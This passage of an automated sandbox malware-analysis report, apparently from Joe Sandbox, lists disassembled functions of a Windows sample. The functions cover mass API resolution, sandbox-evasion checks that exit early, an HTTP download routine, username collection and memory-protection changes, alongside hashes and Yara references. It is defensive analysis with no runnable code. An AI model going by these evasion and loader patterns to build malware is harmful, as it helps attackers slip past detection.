                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F05490), ref: 006E6463
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F05510), ref: 006E647B
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F116A0), ref: 006E6494
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11550), ref: 006E64AC
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11598), ref: 006E64C4
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F116B8), ref: 006E64DD
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F05590), ref: 006E64F5
                                  • Part of subcall function 006E6390: GetProcAddress.KERNEL32(76210000,00F11748), ref: 006E650D
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006E1C2F
                                • ExitProcess.KERNEL32 ref: 006E1C67
                                • GetSystemInfo.KERNEL32(?), ref: 006E1C71
                                • ExitProcess.KERNEL32 ref: 006E1C7F
                                  • Part of subcall function 006C1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006C1046
                                  • Part of subcall function 006C1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 006C104D
                                  • Part of subcall function 006C1030: ExitProcess.KERNEL32 ref: 006C1058
                                  • Part of subcall function 006C10C0: GlobalMemoryStatusEx.KERNEL32 ref: 006C10EA
                                  • Part of subcall function 006C10C0: ExitProcess.KERNEL32 ref: 006C1114
                                • GetUserDefaultLangID.KERNEL32 ref: 006E1C8F
                                • ExitProcess.KERNEL32 ref: 006E1CB2
                                • ExitProcess.KERNEL32 ref: 006E1CE1
                                • lstrlen.KERNEL32(00F18AB0), ref: 006E1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006E1D15
                                • lstrcat.KERNEL32(00000000,00F18AB0), ref: 006E1D1D
                                • lstrlen.KERNEL32(006F4B98), ref: 006E1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D48
                                • lstrcat.KERNEL32(00000000,006F4B98), ref: 006E1D54
                                • lstrlen.KERNEL32(00000000), ref: 006E1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1D94
                                • lstrlen.KERNEL32(006F4B98), ref: 006E1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DBC
                                • lstrcat.KERNEL32(00000000,006F4B98), ref: 006E1DC8
                                • lstrlen.KERNEL32(00000000), ref: 006E1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006E1E04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 2123d10746916c721500707c4b599efdaaa8b1ba700080b52bebda8a88c0fa47
                                • Instruction ID: 1d119da48a334975586c749ce4ed87d872267f1cacb7d77cec2a5f252672e511
                                • Opcode Fuzzy Hash: 2123d10746916c721500707c4b599efdaaa8b1ba700080b52bebda8a88c0fa47
                                • Instruction Fuzzy Hash: CB716D31502756ABDB60ABB2DC49FBE3A7BFF41701F144028F9469B291DF749801DB64
                                Function 006C6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 6c6c40-6c6c64 call 6c2930 2237 6c6c75-6c6c97 call 6c4bc0 2234->2237 2238 6c6c66-6c6c6b 2234->2238 2242 6c6c99 2237->2242 2243 6c6caa-6c6cba call 6c2930 2237->2243 2238->2237 2239 6c6c6d-6c6c6f lstrcpy 2238->2239 2239->2237 2244 6c6ca0-6c6ca8 2242->2244 2247 6c6cbc-6c6cc2 lstrcpy 2243->2247 2248 6c6cc8-6c6cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 6c6cfa-6c6cfc 2248->2249 2250 6c6cf7 2248->2250 2251 6c6ea8-6c6ebb call 6c2930 2249->2251 2252 6c6d02-6c6d22 InternetConnectA 2249->2252 2250->2249 2261 6c6ebd-6c6ebf 2251->2261 2262 6c6ec9-6c6ee0 call 6c2a20 * 2 2251->2262 2253 6c6d28-6c6d5d HttpOpenRequestA 2252->2253 2254 6c6ea1-6c6ea2 InternetCloseHandle 2252->2254 2256 6c6e94-6c6e9e InternetCloseHandle 2253->2256 2257 6c6d63-6c6d65 2253->2257 2254->2251 2256->2254 2259 6c6d7d-6c6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 6c6d67-6c6d77 InternetSetOptionA 2257->2260 2263 6c6daf-6c6dd3 call 6e71e0 call 6c2a20 * 2 2259->2263 2264 6c6dd4-6c6de4 call 6e3d90 2259->2264 2260->2259 2261->2262 2265 6c6ec1-6c6ec3 lstrcpy 2261->2265 2264->2263 2275 6c6de6-6c6de8 2264->2275 2265->2262 2277 6c6e8d-6c6e8e InternetCloseHandle 2275->2277 2278 6c6dee-6c6e07 InternetReadFile 2275->2278 2277->2256 2278->2277 2279 6c6e0d 2278->2279 2281 6c6e10-6c6e15 2279->2281 2281->2277 2283 6c6e17-6c6e3d call 6e7310 2281->2283 2286 6c6e3f call 6c2a20 2283->2286 2287 6c6e44-6c6e51 call 6c2930 2283->2287 2286->2287 2291 6c6e61-6c6e8b call 6c2a20 InternetReadFile 2287->2291 2292 6c6e53-6c6e57 2287->2292 2291->2277 2291->2281 2292->2291 2293 6c6e59-6c6e5b lstrcpy 2292->2293 2293->2291
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C6C6F
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006C6CC2
                                • InternetOpenA.WININET(006ECFEC,00000001,00000000,00000000,00000000), ref: 006C6CD5
                                • StrCmpCA.SHLWAPI(?,00F20BB8), ref: 006C6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006C6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00F205E0,00000000,00000000,-00400100,00000000), ref: 006C6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 006C6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006C6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 006C6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006C6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 006C6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 006C6E8E
                                • InternetCloseHandle.WININET(?), ref: 006C6E98
                                • InternetCloseHandle.WININET(00000000), ref: 006C6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 58521f31a712c021ab548ec67b9d27ab76439fc7f91ad7d30651ec27b859f511
                                • Instruction ID: cec8e4ead9ef593eb62d94f31bbe87546b804e5dfe1d7ef0ada3f3f0cf1d9e7d
                                • Opcode Fuzzy Hash: 58521f31a712c021ab548ec67b9d27ab76439fc7f91ad7d30651ec27b859f511
                                • Instruction Fuzzy Hash: 88816C71A0121AABDB20DFA5DC49FFE77BAEF48700F14406DF949E7280DB70A9458B94
                                Function 006C4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 6c4a60-6c4afc RtlAllocateHeap 2867 6c4afe-6c4b03 2850->2867 2868 6c4b7a-6c4bbe VirtualProtect 2850->2868 2869 6c4b06-6c4b78 2867->2869 2869->2868
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C4AA2
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 006C4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 910793246775f96d9d179f0d530787c4dd868347895947cdecb40da5659dc617
                                • Instruction ID: 37b11ae368b478a8db70004d5f87d5dfcdd2b6bbc9ca52bfc41208516ae5e2e2
                                • Opcode Fuzzy Hash: 910793246775f96d9d179f0d530787c4dd868347895947cdecb40da5659dc617
                                • Instruction Fuzzy Hash: B231CC29B8426D769620EBEF4CC7F7F6F56FF85BA0B034056B608575808DE25504CAB2
                                Function 006E2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006E2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 006E2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 116e71f96ce2431bb03243b02d7be6cff46e421051e3766062860f9d3eec9842
                                • Instruction ID: 5bdd28c600e3016053af4d428cf1d440c8cfa12be83935f1a03c503ae628dc0f
                                • Opcode Fuzzy Hash: 116e71f96ce2431bb03243b02d7be6cff46e421051e3766062860f9d3eec9842
                                • Instruction Fuzzy Hash: 6BF0B4B1A40644EFC700DF98DD49FAEBBBCF744B21F100226F915E3280D7741904C6A1
                                Function 006E66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 6e66e0-6e66e7 634 6e6afe-6e6b92 LoadLibraryA * 8 633->634 635 6e66ed-6e6af9 GetProcAddress * 43 633->635 636 6e6c08-6e6c0f 634->636 637 6e6b94-6e6c03 GetProcAddress * 5 634->637 635->634 638 6e6c15-6e6ccd GetProcAddress * 8 636->638 639 6e6cd2-6e6cd9 636->639 637->636 638->639 640 6e6d4f-6e6d56 639->640 641 6e6cdb-6e6d4a GetProcAddress * 5 639->641 642 6e6d5c-6e6de4 GetProcAddress * 6 640->642 643 6e6de9-6e6df0 640->643 641->640 642->643 644 6e6df6-6e6f0b GetProcAddress * 12 643->644 645 6e6f10-6e6f17 643->645 644->645 646 6e6f8d-6e6f94 645->646 647 6e6f19-6e6f88 GetProcAddress * 5 645->647 648 6e6f96-6e6fbc GetProcAddress * 2 646->648 649 6e6fc1-6e6fc8 646->649 647->646 648->649 650 6e6fca-6e6ff0 GetProcAddress * 2 649->650 651 6e6ff5-6e6ffc 649->651 650->651 652 6e70ed-6e70f4 651->652 653 6e7002-6e70e8 GetProcAddress * 10 651->653 654 6e70f6-6e714d GetProcAddress * 4 652->654 655 6e7152-6e7159 652->655 653->652 654->655 656 6e716e-6e7175 655->656 657 6e715b-6e7169 GetProcAddress 655->657 658 6e7177-6e71ce GetProcAddress * 4 656->658 659 6e71d3 656->659 657->656 658->659
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00F05450), ref: 006E66F5
                                • GetProcAddress.KERNEL32(76210000,00F05610), ref: 006E670D
                                • GetProcAddress.KERNEL32(76210000,00F19060), ref: 006E6726
                                • GetProcAddress.KERNEL32(76210000,00F19078), ref: 006E673E
                                • GetProcAddress.KERNEL32(76210000,00F19018), ref: 006E6756
                                • GetProcAddress.KERNEL32(76210000,00F1E9F0), ref: 006E676F
                                • GetProcAddress.KERNEL32(76210000,00F0A7F0), ref: 006E6787
                                • GetProcAddress.KERNEL32(76210000,00F1EB28), ref: 006E679F
                                • GetProcAddress.KERNEL32(76210000,00F1E918), ref: 006E67B8
                                • GetProcAddress.KERNEL32(76210000,00F1E930), ref: 006E67D0
                                • GetProcAddress.KERNEL32(76210000,00F1EA08), ref: 006E67E8
                                • GetProcAddress.KERNEL32(76210000,00F054B0), ref: 006E6801
                                • GetProcAddress.KERNEL32(76210000,00F05570), ref: 006E6819
                                • GetProcAddress.KERNEL32(76210000,00F055D0), ref: 006E6831
                                • GetProcAddress.KERNEL32(76210000,00F05630), ref: 006E684A
                                • GetProcAddress.KERNEL32(76210000,00F1EA68), ref: 006E6862
                                • GetProcAddress.KERNEL32(76210000,00F1EAC8), ref: 006E687A
                                • GetProcAddress.KERNEL32(76210000,00F0A8B8), ref: 006E6893
                                • GetProcAddress.KERNEL32(76210000,00F05690), ref: 006E68AB
                                • GetProcAddress.KERNEL32(76210000,00F1EB40), ref: 006E68C3
                                • GetProcAddress.KERNEL32(76210000,00F1EAE0), ref: 006E68DC
                                • GetProcAddress.KERNEL32(76210000,00F1EC00), ref: 006E68F4
                                • GetProcAddress.KERNEL32(76210000,00F1EBE8), ref: 006E690C
                                • GetProcAddress.KERNEL32(76210000,00F056B0), ref: 006E6925
                                • GetProcAddress.KERNEL32(76210000,00F1EAF8), ref: 006E693D
                                • GetProcAddress.KERNEL32(76210000,00F1EA80), ref: 006E6955
                                • GetProcAddress.KERNEL32(76210000,00F1EA20), ref: 006E696E
                                • GetProcAddress.KERNEL32(76210000,00F1EA38), ref: 006E6986
                                • GetProcAddress.KERNEL32(76210000,00F1EAB0), ref: 006E699E
                                • GetProcAddress.KERNEL32(76210000,00F1E990), ref: 006E69B7
                                • GetProcAddress.KERNEL32(76210000,00F1EA50), ref: 006E69CF
                                • GetProcAddress.KERNEL32(76210000,00F1E948), ref: 006E69E7
                                • GetProcAddress.KERNEL32(76210000,00F1E9A8), ref: 006E6A00
                                • GetProcAddress.KERNEL32(76210000,00F0FB70), ref: 006E6A18
                                • GetProcAddress.KERNEL32(76210000,00F1EBD0), ref: 006E6A30
                                • GetProcAddress.KERNEL32(76210000,00F1E9C0), ref: 006E6A49
                                • GetProcAddress.KERNEL32(76210000,00F056D0), ref: 006E6A61
                                • GetProcAddress.KERNEL32(76210000,00F1EA98), ref: 006E6A79
                                • GetProcAddress.KERNEL32(76210000,00F056F0), ref: 006E6A92
                                • GetProcAddress.KERNEL32(76210000,00F1E960), ref: 006E6AAA
                                • GetProcAddress.KERNEL32(76210000,00F1E9D8), ref: 006E6AC2
                                • GetProcAddress.KERNEL32(76210000,00F05370), ref: 006E6ADB
                                • GetProcAddress.KERNEL32(76210000,00F05390), ref: 006E6AF3
                                • LoadLibraryA.KERNEL32(00F1EB10,006E051F), ref: 006E6B05
                                • LoadLibraryA.KERNEL32(00F1E978), ref: 006E6B16
                                • LoadLibraryA.KERNEL32(00F1EB58), ref: 006E6B28
                                • LoadLibraryA.KERNEL32(00F1EB70), ref: 006E6B3A
                                • LoadLibraryA.KERNEL32(00F1EB88), ref: 006E6B4B
                                • LoadLibraryA.KERNEL32(00F1EBA0), ref: 006E6B5D
                                • LoadLibraryA.KERNEL32(00F1EBB8), ref: 006E6B6F
                                • LoadLibraryA.KERNEL32(00F1ED38), ref: 006E6B80
                                • GetProcAddress.KERNEL32(751E0000,00F050F0), ref: 006E6B9C
                                • GetProcAddress.KERNEL32(751E0000,00F1EDF8), ref: 006E6BB4
                                • GetProcAddress.KERNEL32(751E0000,00F18B10), ref: 006E6BCD
                                • GetProcAddress.KERNEL32(751E0000,00F1EE28), ref: 006E6BE5
                                • GetProcAddress.KERNEL32(751E0000,00F05010), ref: 006E6BFD
                                • GetProcAddress.KERNEL32(738C0000,00F0A688), ref: 006E6C1D
                                • GetProcAddress.KERNEL32(738C0000,00F05290), ref: 006E6C35
                                • GetProcAddress.KERNEL32(738C0000,00F0A890), ref: 006E6C4E
                                • GetProcAddress.KERNEL32(738C0000,00F1EDB0), ref: 006E6C66
                                • GetProcAddress.KERNEL32(738C0000,00F1EDC8), ref: 006E6C7E
                                • GetProcAddress.KERNEL32(738C0000,00F05090), ref: 006E6C97
                                • GetProcAddress.KERNEL32(738C0000,00F05150), ref: 006E6CAF
                                • GetProcAddress.KERNEL32(738C0000,00F1EC78), ref: 006E6CC7
                                • GetProcAddress.KERNEL32(753A0000,00F05030), ref: 006E6CE3
                                • GetProcAddress.KERNEL32(753A0000,00F05330), ref: 006E6CFB
                                • GetProcAddress.KERNEL32(753A0000,00F1ECF0), ref: 006E6D14
                                • GetProcAddress.KERNEL32(753A0000,00F1EC30), ref: 006E6D2C
                                • GetProcAddress.KERNEL32(753A0000,00F04F70), ref: 006E6D44
                                • GetProcAddress.KERNEL32(76310000,00F0A570), ref: 006E6D64
                                • GetProcAddress.KERNEL32(76310000,00F0A5C0), ref: 006E6D7C
                                • GetProcAddress.KERNEL32(76310000,00F1ED08), ref: 006E6D95
                                • GetProcAddress.KERNEL32(76310000,00F050B0), ref: 006E6DAD
                                • GetProcAddress.KERNEL32(76310000,00F04F90), ref: 006E6DC5
                                • GetProcAddress.KERNEL32(76310000,00F0A5E8), ref: 006E6DDE
                                • GetProcAddress.KERNEL32(76910000,00F1ED20), ref: 006E6DFE
                                • GetProcAddress.KERNEL32(76910000,00F05110), ref: 006E6E16
                                • GetProcAddress.KERNEL32(76910000,00F18AF0), ref: 006E6E2F
                                • GetProcAddress.KERNEL32(76910000,00F1ED68), ref: 006E6E47
                                • GetProcAddress.KERNEL32(76910000,00F1EC90), ref: 006E6E5F
                                • GetProcAddress.KERNEL32(76910000,00F05050), ref: 006E6E78
                                • GetProcAddress.KERNEL32(76910000,00F05070), ref: 006E6E90
                                • GetProcAddress.KERNEL32(76910000,00F1ED98), ref: 006E6EA8
                                • GetProcAddress.KERNEL32(76910000,00F1EC48), ref: 006E6EC1
                                • GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 006E6ED7
                                • GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 006E6EEE
                                • GetProcAddress.KERNEL32(76910000,CloseDesktop), ref: 006E6F05
                                • GetProcAddress.KERNEL32(75B30000,00F051D0), ref: 006E6F21
                                • GetProcAddress.KERNEL32(75B30000,00F1ED80), ref: 006E6F39
                                • GetProcAddress.KERNEL32(75B30000,00F1EC60), ref: 006E6F52
                                • GetProcAddress.KERNEL32(75B30000,00F1ED50), ref: 006E6F6A
                                • GetProcAddress.KERNEL32(75B30000,00F1EDE0), ref: 006E6F82
                                • GetProcAddress.KERNEL32(75670000,00F050D0), ref: 006E6F9E
                                • GetProcAddress.KERNEL32(75670000,00F051F0), ref: 006E6FB6
                                • GetProcAddress.KERNEL32(76AC0000,00F05130), ref: 006E6FD2
                                • GetProcAddress.KERNEL32(76AC0000,00F1EE10), ref: 006E6FEA
                                • GetProcAddress.KERNEL32(6F4E0000,00F052B0), ref: 006E700A
                                • GetProcAddress.KERNEL32(6F4E0000,00F04FB0), ref: 006E7022
                                • GetProcAddress.KERNEL32(6F4E0000,00F05170), ref: 006E703B
                                • GetProcAddress.KERNEL32(6F4E0000,00F1EED0), ref: 006E7053
                                • GetProcAddress.KERNEL32(6F4E0000,00F05310), ref: 006E706B
                                • GetProcAddress.KERNEL32(6F4E0000,00F05270), ref: 006E7084
                                • GetProcAddress.KERNEL32(6F4E0000,00F05230), ref: 006E709C
                                • GetProcAddress.KERNEL32(6F4E0000,00F052F0), ref: 006E70B4
                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 006E70CB
                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 006E70E2
                                • GetProcAddress.KERNEL32(75AE0000,00F1EE40), ref: 006E70FE
                                • GetProcAddress.KERNEL32(75AE0000,00F18C60), ref: 006E7116
                                • GetProcAddress.KERNEL32(75AE0000,00F1EE58), ref: 006E712F
                                • GetProcAddress.KERNEL32(75AE0000,00F1EE70), ref: 006E7147
                                • GetProcAddress.KERNEL32(76300000,00F05190), ref: 006E7163
                                • GetProcAddress.KERNEL32(6D380000,00F1EEA0), ref: 006E717F
                                • GetProcAddress.KERNEL32(6D380000,00F051B0), ref: 006E7197
                                • GetProcAddress.KERNEL32(6D380000,00F1EE88), ref: 006E71B0
                                • GetProcAddress.KERNEL32(6D380000,00F1EEB8), ref: 006E71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
